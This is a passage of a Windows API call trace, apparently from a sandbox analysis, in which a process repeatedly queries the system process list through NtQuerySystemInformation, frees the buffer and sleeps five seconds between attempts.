returned 0x0 [0245.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.031] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.129] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 